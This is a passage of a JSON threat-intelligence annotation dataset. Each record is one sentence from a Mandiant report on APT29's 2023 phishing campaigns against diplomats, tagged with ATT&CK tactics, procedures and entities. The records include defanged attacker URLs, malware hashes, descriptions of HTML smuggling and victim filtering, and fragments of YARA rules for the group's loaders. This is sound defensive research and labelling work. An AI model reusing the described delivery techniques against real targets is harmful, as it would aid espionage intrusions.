] }, { "uid": "mandiant-24_mandiant_report-p1-s45-3190fa", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 45, "context_before": "May 2023: Ukraine Foreign Embassy-Focused Campaigns In May, in the lead up to Ukraine’s counteroffensive, APT29 conducted two distinct phishing waves targeting a wide range of diplomatic representations in Kyiv, including those of Moscow’s partners.", "sentence_text": "Each campaign adopted separate intrusion chains similar to those seen in March and April 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s46-510b2d", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 46, "context_before": "Each campaign adopted separate intrusion chains similar to those seen in March and April 2023.", "sentence_text": "In the first wave in early May, an repurposed advert for a BMW sale in Kyiv was circulated, directing victims to an actor-controlled server at “https://resetlocations[.]com/bmw.htm”, which delivered a weaponized ISO file, \"bmw.iso\" (MD5: e306333093eaf198f4d416d25a40784a).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Phishing: Link" } ], "procedure": "Direct victims to server delivering weaponized ISO.", "entities": [ { "text": "directing victims to an actor-controlled server", "start": 92, "end": 139, "label": "Action" }, { "text": "https://resetlocations[.]com/bmw.htm", "start": 144, "end": 180, "label": "Infrastructure_Indicator" }, { "text": "delivered a weaponized ISO file", "start": 189, "end": 220, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s47-d3e8b6", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 47, "context_before": "In the first wave in early May, an repurposed advert for a BMW sale in Kyiv was circulated, directing victims to an actor-controlled server at “https://resetlocations[.]com/bmw.htm”, which delivered a weaponized ISO file, \"bmw.iso\" (MD5: e306333093eaf198f4d416d25a40784a).", "sentence_text": "The version of ROOTSAW used in this campaign shares similarities to variants used in March against Türkiye.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s48-fa0385", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 48, "context_before": "The version of ROOTSAW used in this campaign shares similarities to variants used in March against Türkiye.", "sentence_text": "Depending on user-agent filtering, the ISO or a decoy image of the BMW would be displayed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s49-031743", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 49, "context_before": "Depending on user-agent filtering, the ISO or a decoy image of the BMW would be displayed.", "sentence_text": "In the second wave mid-May, an invite for a charity concert in Kyiv with a mistyped filename “Invintation.zip” (MD5: 38719acc6254b7ff70dc8a7723bd8e92) was sent to targets, likely also using a copy of a legitimate document.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s50-3622db", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "In the second wave mid-May, an invite for a charity concert in Kyiv with a mistyped filename “Invintation.zip” (MD5: 38719acc6254b7ff70dc8a7723bd8e92) was sent to targets, likely also using a copy of a legitimate document.", "sentence_text": "Similar to the April wine-themed campaign, payloads were hosted directly on actor-controlled infrastructure that used user-agent filtering to deliver either a ZIP file with decoy PDF documents (MD5:38719acc6254b7ff70dc8a7723bd8e92), or a ZIP file containing a second-stage payloads (MD5:1aee5bf23edb7732fd0e6b2c61a959ce) to victims.\nJune 2023:", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1497", "name": "Virtualization/Sandbox Evasion" } ], "procedure": "Host payloads on actor-controlled infrastructure and use user-agent filtering to deliver ZIP files to victims.", "entities": [ { "text": "payloads were hosted directly on actor-controlled infrastructure", "start": 43, "end": 107, "label": "Action" }, { "text": "actor-controlled infrastructure", "start": 76, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "used user-agent filtering", "start": 113, "end": 138, "label": "Action" }, { "text": "deliver either a ZIP file with decoy PDF documents", "start": 142, "end": 192, "label": "Action" }, { "text": "ZIP file containing a second-stage payloads", "start": 238, "end": 281, "label": "MalwareTool" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s51-3ebcf8", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "Similar to the April wine-themed campaign, payloads were hosted directly on actor-controlled infrastructure that used user-agent filtering to deliver either a ZIP file with decoy PDF documents (MD5:38719acc6254b7ff70dc8a7723bd8e92), or a ZIP file containing a second-stage payloads (MD5:1aee5bf23edb7732fd0e6b2c61a959ce) to victims.\nJune 2023:", "sentence_text": "Split ROOTSAW Campaign In late June, Mandiant identified an additional APT29 phishing campaign with a new variant of ROOTSAW to target a European government.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s52-49ee70", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "Split ROOTSAW Campaign In late June, Mandiant identified an additional APT29 phishing campaign with a new variant of ROOTSAW to target a European government.", "sentence_text": "Phishing emails were sent from a compromised North American government email address and crafted to appear as an invitation to a public holiday celebration from Norwegian embassy personnel.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Phishing: Spearphishing Attachment" } ], "procedure": "Send phishing emails from a compromised government email address crafted as an invitation from embassy personnel.", "entities": [ { "text": "Phishing emails were sent", "start": 0, "end": 25, "label": "Action" }, { "text": "compromised North American government email address", "start": 33, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "crafted to appear as an invitation to a public holiday celebration", "start": 89, "end": 155, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s53-d592f6", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "Phishing emails were sent from a compromised North American government email address and crafted to appear as an invitation to a public holiday celebration from Norwegian embassy personnel.", "sentence_text": "Two different delivery mechanisms were used in this campaign, a PDF (MD5: b4141aa8d234137f0b9549a448158a95) containing a link to an actor-hosted ROOTSAW variant, and emails with an attached Scalable Vector Graphic (SVG) file (MD5: 295527e2e38da97167979ade004de880) rather than the typical HTML payload.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s54-df292f", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "Two different delivery mechanisms were used in this campaign, a PDF (MD5: b4141aa8d234137f0b9549a448158a95) containing a link to an actor-hosted ROOTSAW variant, and emails with an attached Scalable Vector Graphic (SVG) file (MD5: 295527e2e38da97167979ade004de880) rather than the typical HTML payload.", "sentence_text": "Notably, although APT29 used a compromised WordPress server to host the ROOTSAW payload, non-valid targets received a generic HTTP 404 error rather than the traditional WordPress 404.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1497", "name": "Virtualization/Sandbox Evasion" } ], "procedure": "Host ROOTSAW payload on a compromised WordPress server and return HTTP 404 responses to non-valid targets.", "entities": [ { "text": "APT29", "start": 18, "end": 23, "label": "ThreatActor" }, { "text": "used a compromised WordPress server to host the ROOTSAW payload", "start": 24, "end": 87, "label": "Action" }, { "text": "compromised WordPress server", "start": 31, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "received a generic HTTP 404 error", "start": 107, "end": 140, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s55-b8be7a", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "Notably, although APT29 used a compromised WordPress server to host the ROOTSAW payload, non-valid targets received a generic HTTP 404 error rather than the traditional WordPress 404.", "sentence_text": "The ROOTSAW variant contained in the SVG file is similar to those first identified in 2021, indicating that the threat actor may have only recently adopted SVG files for its HTML smuggling technique.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s56-04771c", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "The ROOTSAW variant contained in the SVG file is similar to those first identified in 2021, indicating that the threat actor may have only recently adopted SVG files for its HTML smuggling technique.", "sentence_text": "Consistent with other cases where APT29 has introduced new delivery methods for ROOTSAW, the group reverted to a primitive ROOTSAW payload without anti-analysis techniques or other forms of hardening.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s58-e039f2", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 58, "context_before": "July 2023:", "sentence_text": "ICEBEAT Campaign In July, APT29 continued to experiment with new ROOTSAW delivery mechanisms and victim filtering capabilities in an operation deploying a new downloader ICEBEAT to target European diplomatic entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s59-ec8bd2", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 59, "context_before": "ICEBEAT Campaign In July, APT29 continued to experiment with new ROOTSAW delivery mechanisms and victim filtering capabilities in an operation deploying a new downloader ICEBEAT to target European diplomatic entities.", "sentence_text": "Of note, ICEBEAT’s use of the open source Zulip messaging platform for command and control (C2) follows a pattern of past APT29 downloaders using legitimate services for command and control including Dropbox, Firebase, OneDrive and Trello.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s60-92ea2f", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 60, "context_before": "Of note, ICEBEAT’s use of the open source Zulip messaging platform for command and control (C2) follows a pattern of past APT29 downloaders using legitimate services for command and control including Dropbox, Firebase, OneDrive and Trello.", "sentence_text": "For the first time in this campaign, ROOTSAW was contained within a PDF document.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s61-fc5749", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 61, "context_before": "For the first time in this campaign, ROOTSAW was contained within a PDF document.", "sentence_text": "When opened, the PDF document writes an HTML file to disk, that when launched, writes a follow-on ZIP file to disk and beacons to an actor controlled domain “https://sgrfh[.]org.pk/wp-content/idx.php?n=ks&q=” to profile victim information.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1204", "name": "User Execution" }, { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Write files and beacon to remote domain.", "entities": [ { "text": "writes an HTML file to disk", "start": 30, "end": 57, "label": "Action" }, { "text": "writes a follow-on ZIP file to disk", "start": 79, "end": 114, "label": "Action" }, { "text": "beacons to an actor controlled domain", "start": 119, "end": 156, "label": "Action" }, { "text": "https://sgrfh[.]org.pk/wp-content/idx.php?n=ks&q=", "start": 158, "end": 207, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s62-c8e5bb", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 62, "context_before": "When opened, the PDF document writes an HTML file to disk, that when launched, writes a follow-on ZIP file to disk and beacons to an actor controlled domain “https://sgrfh[.]org.pk/wp-content/idx.php?n=ks&q=” to profile victim information.", "sentence_text": "Victims who met filtering requirements were delivered a Save the date decoy PDF document (MD5: 50f57a4a4bf2c4b504954a36d48c99e7) and delivered the next-stage downloader ICEBEAT that is responsible for downloading follow-on capabilities from the Zulip messaging service.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": null, "procedure": "Deliver a decoy PDF document and the next-stage ICEBEAT downloader to victims who passed filtering requirements.", "entities": [ { "text": "met filtering requirements", "start": 12, "end": 38, "label": "Action" }, { "text": "were delivered a Save the date decoy PDF document", "start": 39, "end": 88, "label": "Action" }, { "text": "delivered the next-stage downloader ICEBEAT", "start": 133, "end": 176, "label": "Action" }, { "text": "ICEBEAT", "start": 169, "end": 176, "label": "MalwareTool" }, { "text": "downloading follow-on capabilities from the Zulip messaging service", "start": 201, "end": 268, "label": "Action" }, { "text": "Zulip messaging service", "start": 245, "end": 268, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s63-c02823", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 63, "context_before": "Victims who met filtering requirements were delivered a Save the date decoy PDF document (MD5: 50f57a4a4bf2c4b504954a36d48c99e7) and delivered the next-stage downloader ICEBEAT that is responsible for downloading follow-on capabilities from the Zulip messaging service.", "sentence_text": "In instances where the victim did not meet filtering requirements, a separate benign decoy document referencing German Unity Day (MD5: ffce57940b0257a72db4969565cbcebc) was delivered in place of ICEBEAT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s64-5a8113", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 64, "context_before": "In instances where the victim did not meet filtering requirements, a separate benign decoy document referencing German Unity Day (MD5: ffce57940b0257a72db4969565cbcebc) was delivered in place of ICEBEAT.", "sentence_text": "At least six distinct downloaders have been identified during the first half of 2023:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s65-379a0a", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 65, "context_before": "At least six distinct downloaders have been identified during the first half of 2023:", "sentence_text": "BURNTBATTER is an in-memory loader responsible for decrypting and executing a payload from disk into a running process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s66-d84362", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 66, "context_before": "BURNTBATTER is an in-memory loader responsible for decrypting and executing a payload from disk into a running process.", "sentence_text": "BURNTBATTER has been witnessed loading the SPICYBEAT downloader via a position-independent shellcode dropper called DONUT.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "Loaded the SPICYBEAT downloader using a position-independent shellcode dropper (DONUT).", "entities": [ { "text": "BURNTBATTER", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "SPICYBEAT downloader", "start": 43, "end": 63, "label": "MalwareTool" }, { "text": "DONUT", "start": 116, "end": 121, "label": "MalwareTool" }, { "text": "loading the SPICYBEAT downloader via a position-independent shellcode", "start": 31, "end": 100, "label": "Action" } ] }, { "uid": "mandiant-24_mandiant_report-p1-s67-949bb0", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 67, "context_before": "BURNTBATTER has been witnessed loading the SPICYBEAT downloader via a position-independent shellcode dropper called DONUT.", "sentence_text": "DONUT is a publicly available tool that creates position-independent shellcode that loads .NET", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s68-a27b35", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 68, "context_before": "DONUT is a publicly available tool that creates position-independent shellcode that loads .NET", "sentence_text": "SPICYBEAT is a downloader written in C++ responsible for downloading a next-stage payload from either DropBox or Microsoft's OneDrive.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s69-2a317a", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 69, "context_before": "SPICYBEAT is a downloader written in C++ responsible for downloading a next-stage payload from either DropBox or Microsoft's OneDrive.", "sentence_text": "MUSKYBEAT is an in-memory dropper that decodes the next-stage payload and strings using RC4 and executes in the current process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s70-830a18", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 70, "context_before": "MUSKYBEAT is an in-memory dropper that decodes the next-stage payload and strings using RC4 and executes in the current process.", "sentence_text": "STATICNOISE is a downloader written in C responsible for downloading and executing the final-stage payload in memory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s71-01b21f", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 71, "context_before": "STATICNOISE is a downloader written in C responsible for downloading and executing the final-stage payload in memory.", "sentence_text": "DAVESHELL is shellcode that functions as an in-memory dropper relying on reflective injection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s72-47d235", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 72, "context_before": "DAVESHELL is shellcode that functions as an in-memory dropper relying on reflective injection.", "sentence_text": "Its embedded payload is mapped into memory and executed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s73-6d0cb8", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 73, "context_before": "Its embedded payload is mapped into memory and executed.", "sentence_text": "DAVESHELL is based in the public available repository As noted in the June 2023 campaign, we have also witnessed APT29 operating various infection chains simultaneously within a single campaign, suggesting that distinct initial access operators or subteams may be operating in parallel to service different regional targets or espionage objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s74-d2c979", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 74, "context_before": "DAVESHELL is based in the public available repository As noted in the June 2023 campaign, we have also witnessed APT29 operating various infection chains simultaneously within a single campaign, suggesting that distinct initial access operators or subteams may be operating in parallel to service different regional targets or espionage objectives.", "sentence_text": "Although we have been unable to ascertain the specific logic behind decisions about which malware delivery approach to use or when to introduce new later-stage malware variants, we judge with low confidence that they are likely driven by mission-specific parameters such as targets or operational objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s75-eaec62", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 75, "context_before": "Although we have been unable to ascertain the specific logic behind decisions about which malware delivery approach to use or when to introduce new later-stage malware variants, we judge with low confidence that they are likely driven by mission-specific parameters such as targets or operational objectives.", "sentence_text": "The first use of new capabilities are typically reserved for targets inside Ukraine or diplomatic entities associated with North Atlantic Treaty Organization (NATO) or European Union (EU) member states, areas of likely heightened strategic importance given Moscow’s need to understand political and military dynamics surrounding its war in Ukraine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s76-8f8419", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 76, "context_before": "The first use of new capabilities are typically reserved for targets inside Ukraine or diplomatic entities associated with North Atlantic Treaty Organization (NATO) or European Union (EU) member states, areas of likely heightened strategic importance given Moscow’s need to understand political and military dynamics surrounding its war in Ukraine.", "sentence_text": "Patterns of controlled first-use possibly extend back to the emergence of APT29’s diplomatic-focused phishing cluster in 2021.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s77-b4a64f", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 77, "context_before": "Patterns of controlled first-use possibly extend back to the emergence of APT29’s diplomatic-focused phishing cluster in 2021.", "sentence_text": "As detailed by , multiple aspects of the malware delivery chain were likely tailored for a highly-targeted operation against Ukrainian government entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s78-3c3b63", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 78, "context_before": "As detailed by , multiple aspects of the malware delivery chain were likely tailored for a highly-targeted operation against Ukrainian government entities.", "sentence_text": "Conclusions\nThe increased scope and frequency of APT29's diplomatic-focused spear phishing campaigns in the first half of 2023 has compelled the initial access team to make repeated modifications to its long-standing malware delivery chain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s79-c76d68", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 79, "context_before": "Conclusions\nThe increased scope and frequency of APT29's diplomatic-focused spear phishing campaigns in the first half of 2023 has compelled the initial access team to make repeated modifications to its long-standing malware delivery chain.", "sentence_text": "APT29's increased operational tempo has also exposed patterns of operations that likely reflect different initial access operators or subteams supported by a centralized development team.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s80-03949d", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 80, "context_before": "APT29's increased operational tempo has also exposed patterns of operations that likely reflect different initial access operators or subteams supported by a centralized development team.", "sentence_text": "More generally, these patterns likely reflect a growing mission and pool of resources dedicated to collecting political intelligence and that group will almost certainly continue to pose a high severity threat to governments and diplomatic entities globally.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s81-188033", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 81, "context_before": "More generally, these patterns likely reflect a growing mission and pool of resources dedicated to collecting political intelligence and that group will almost certainly continue to pose a high severity threat to governments and diplomatic entities globally.", "sentence_text": "Protecting The Community As part of our efforts to combat serious threat actors, TAG uses the results of our research to improve the safety and security of Google’s products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s82-aa4208", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 82, "context_before": "Protecting The Community As part of our efforts to combat serious threat actors, TAG uses the results of our research to improve the safety and security of Google’s products.", "sentence_text": "Upon discovery, all identified websites and domains are added to Safe Browsing to protect users from further exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s83-881ff2", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 83, "context_before": "Upon discovery, all identified websites and domains are added to Safe Browsing to protect users from further exploitation.", "sentence_text": "TAG also sends all targeted Gmail and Workspace users government-backed attacker alerts notifying them of the activity and encourages potential targets to enable Enhanced Safe Browsing for Chrome and ensure that all devices are updated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s84-08e4da", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 84, "context_before": "TAG also sends all targeted Gmail and Workspace users government-backed attacker alerts notifying them of the activity and encourages potential targets to enable Enhanced Safe Browsing for Chrome and ensure that all devices are updated.", "sentence_text": "Where possible, Mandiant sends victim notifications via the Victim Notification Program .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s85-425733", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 85, "context_before": "Where possible, Mandiant sends victim notifications via the Victim Notification Program .", "sentence_text": "We are committed to sharing our findings with the security community to raise awareness, and with companies and individuals that might have been targeted by these activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s86-1e8836", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 86, "context_before": "We are committed to sharing our findings with the security community to raise awareness, and with companies and individuals that might have been targeted by these activities.", "sentence_text": "We hope that improved understanding of tactics and techniques will enhance threat hunting capabilities and lead to stronger user protections across the industry.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s87-5898f4", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 87, "context_before": "We hope that improved understanding of tactics and techniques will enhance threat hunting capabilities and lead to stronger user protections across the industry.", "sentence_text": "Appendix\nATT&CK Matrix\nDetection Rules\nrule M_Dropper_BURNTBATTER_1\n{\nmeta:\nauthor = \"Mandiant\" date_created = \"2023/04/26\" description = \"Searches for the custom chaskey implementation\" version = \"1\" weight = \"100\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s88-17d3a5", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 88, "context_before": "Appendix\nATT&CK Matrix\nDetection Rules\nrule M_Dropper_BURNTBATTER_1\n{\nmeta:\nauthor = \"Mandiant\" date_created = \"2023/04/26\" description = \"Searches for the custom chaskey implementation\" version = \"1\" weight = \"100\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"", "sentence_text": "author = \"Mandiant\" date_created = \"2023-04-12\" description = \"Detects the structure of the Donut loader\" version = \"1\" weight = \"100\" condition:\nuint8(0)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s89-051ce2", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 89, "context_before": "author = \"Mandiant\" date_created = \"2023-04-12\" description = \"Detects the structure of the Donut loader\" version = \"1\" weight = \"100\" condition:\nuint8(0)", "sentence_text": "== 0xE8 and uint32(1)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s90-7e5f85", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 90, "context_before": "== 0xE8 and uint32(1)", "sentence_text": "== 0x59 } rule M_Downloader_STATICNOISE_1 { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s91-14e97e", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 91, "context_before": "== 0x59 } rule M_Downloader_STATICNOISE_1 { meta:", "sentence_text": "author = \"Mandiant\" date_created = \"2023-04-14\" description = \"Detects the deobfuscation algorithm and rc4 from STATICNOISE\" version = \"1\" weight = \"100\" strings:\n$ = {41 8A C8 48 B8", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s92-ba4dac", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 92, "context_before": "author = \"Mandiant\" date_created = \"2023-04-14\" description = \"Detects the deobfuscation algorithm and rc4 from STATICNOISE\" version = \"1\" weight = \"100\" strings:\n$ = {41 8A C8 48 B8", "sentence_text": "[8] 80 E1 07 C0 E1 03 48 D3 E8 41 30 04 10 49 FF C0} $ = {80 E1 07 C0 E1 03 48 b8 [8] 48 D3 E8 30 04 17 48 FF C7 48 83 FF} $ = {40 88 2C 3A 49 8B 02 88 0C 06 45 89 0B 44 89 03 4D 8B 0A} $ = {4D 8B 0A 46 0F BE 04 0A 44 03 C1 41 81 E0 FF 00 00 80} condition:\nall of them } rule M_Dropper_MUSKYBEAT_1 {", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s93-6a6dab", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 93, "context_before": "[8] 80 E1 07 C0 E1 03 48 D3 E8 41 30 04 10 49 FF C0} $ = {80 E1 07 C0 E1 03 48 b8 [8] 48 D3 E8 30 04 17 48 FF C7 48 83 FF} $ = {40 88 2C 3A 49 8B 02 88 0C 06 45 89 0B 44 89 03 4D 8B 0A} $ = {4D 8B 0A 46 0F BE 04 0A 44 03 C1 41 81 E0 FF 00 00 80} condition:\nall of them } rule M_Dropper_MUSKYBEAT_1 {", "sentence_text": "meta:\nauthor = \"Mandiant\" date_created = \"2023-04-06\" description = \"Detects the RC4 encryption algorithm used in MUSKYBEAT\" version = \"1\" weight = \"100\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s94-2a093e", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 94, "context_before": "meta:\nauthor = \"Mandiant\" date_created = \"2023-04-06\" description = \"Detects the RC4 encryption algorithm used in MUSKYBEAT\" version = \"1\" weight = \"100\" disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"", "sentence_text": "8A C2 41 02 04 08 44 02 D0 41 0F B6 CA} $ = {41 B9 04 00 00 00 41 B8 00 30 00 00 48 8B D3 33 C9} condition:\nall of them } rule M_Hunting_DaveShell_Dropper_1_2 {", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-24_mandiant_report-p1-s95-851d16", "source": "mandiant", "doc_id": "24_mandiant_report", "page_number": 1, "sentence_id": 95, "context_before": "8A C2 41 02 04 08 44 02 D0 41 0F B6 CA} $ = {41 B9 04 00 00 00 41 B8 00 30 00 00 48 8B D3 33 C9} condition:\nall of them } rule M_Hunting_DaveShell_Dropper_1_2 {", "sentence_text": "meta:\nauthor = \"Mandiant\" description = \"Detects Shellcode RDI projects from 